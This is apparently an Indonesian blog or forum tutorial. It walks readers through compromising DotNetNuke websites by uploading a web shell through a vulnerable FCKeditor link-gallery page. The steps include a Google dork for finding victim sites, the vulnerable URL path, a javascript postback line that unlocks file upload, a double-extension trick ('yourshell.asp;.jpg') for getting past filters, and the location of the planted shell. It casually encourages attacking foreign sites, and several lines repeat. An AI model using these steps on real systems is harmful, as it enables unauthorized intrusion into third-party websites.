Hallo Para agan" semua :cheer:
Ane mau bikin tutor nih cara upload shell menggunakan bug DNN (Dot Net
Nuke) ane perhatiin ko jarang yg bikin tutor akhir" ini y udah ane bikin
aja nih tutorial buat ngeramaiin aja :tepuktangan:
Jadi apa itu DNN? Dan bagaimana caranya untuk menyerang?
DotNetNuke adalah platform open source untuk membuat website yg berbasis pada Microsoft .NET technology.
DotNetNuke banyak di gunakan pada Content Management System(CMS) untuk web pribadi,
DotNetNuke adalah platform open source untuk membuat website yg berbasis pada Microsoft .NET technology.
DotNetNuke banyak di gunakan pada Content Management System(CMS) untuk web pribadi,
Ok kita mulai
1> Gunakan google dork ini untuk mencari target "inurl:/tabid/36/language/en-US/Default.aspx " pilih salah satu target. ingat ya jgn web lokal (id) kasian gan :hantu:
2> Sekarang kita lihat web yg di klik tadi ganti tulisan ini pada tab urlmu : " /tabid/36/language/en-US/Default.aspx " dengan " /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx "
Jika web tidak vulnerable(atau tidak bisa di serang) maka halaman akan berubah seperti ini
![[Image: 330s2mc.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uHC2mFGuCJPt8M_D0I1Dc2ZUU4x3mUiI2geKUrwRib-qeAARQE1MfYid7hSHmKx5ng_pULSWlsLfTbNnXjePU3Z8O1LA=s0-d)
tapi jangan berkecil hati gan,cs mungkin masih ada bug yg lain di dalam situs trsbt,seperti XSS,RFI,SQL..dll :sombong:
tapi jangan berkecil hati gan,cs mungkin masih ada bug yg lain di dalam situs trsbt,seperti XSS,RFI,SQL..dll :sombong:
Tapi Jika web vuln akan tampak halaman seperti ini
![[Image: 153pg6t.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t9kagC0kWhAV1HCAntCzruZjwDDoxafQ0z7E-lwuNVVGzyYQgEpCo1cupO6bFT8yaKnrDzPPTdm5oiLwyUGmfM82ME1g=s0-d)
lalu klik tombol file yg nantinya akan terlihat tulisan "Root",dibawah "File location"
lalu klik tombol file yg nantinya akan terlihat tulisan "Root",dibawah "File location"
setelah itu masukan code javascript ini pada tab url(tab yg biasa buat ngetik halaman http://www.blabla.com) DAN tekan enter :
code trsbt akan memungkinkan agan untuk upload file dari Pc agan
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')3> Upload shell
Jika tidak ada masalah harusnya agan sudah bisa upload shell agan,tapi kebanyakan website tidak mengijinkan upload file berekstensi php dan asp,
hanya dapat mengupload file berekstensi
Code:
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png,
*.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg,
*.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob:cara gampangnya tinggal rubah saja ekstensi shell agan,
contoh:" yourshell.asp;.jpg "
ATAU mungkin juga bisa menggunakan tamper data gan :ganteng:
setelah memilih shell,agan klik Upload selected File
![[Image: 29vlyt1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tLg44y0fZZupYYt0YSP422IwZIHHo-Pb64pWavEw4tw_ikma5y_OWujvU9KG1k2K3cIoJ_AzAcgN_vOZ9-W6AjIhMhk_1f=s0-d)
terserah agan untuk mengganti ekstensi , yg di atas hanya contoh
sekarang tinggal panggil shell agan
biasanya letak shell agan di mari : http://www.example.com/portals/0/shell.asp;.jpg.jpg
dan Voila shell agan berhasil di upload
0 Response to "Tutorial DNN-Dot Net Nuke:Vuln Shell upload "
Post a Comment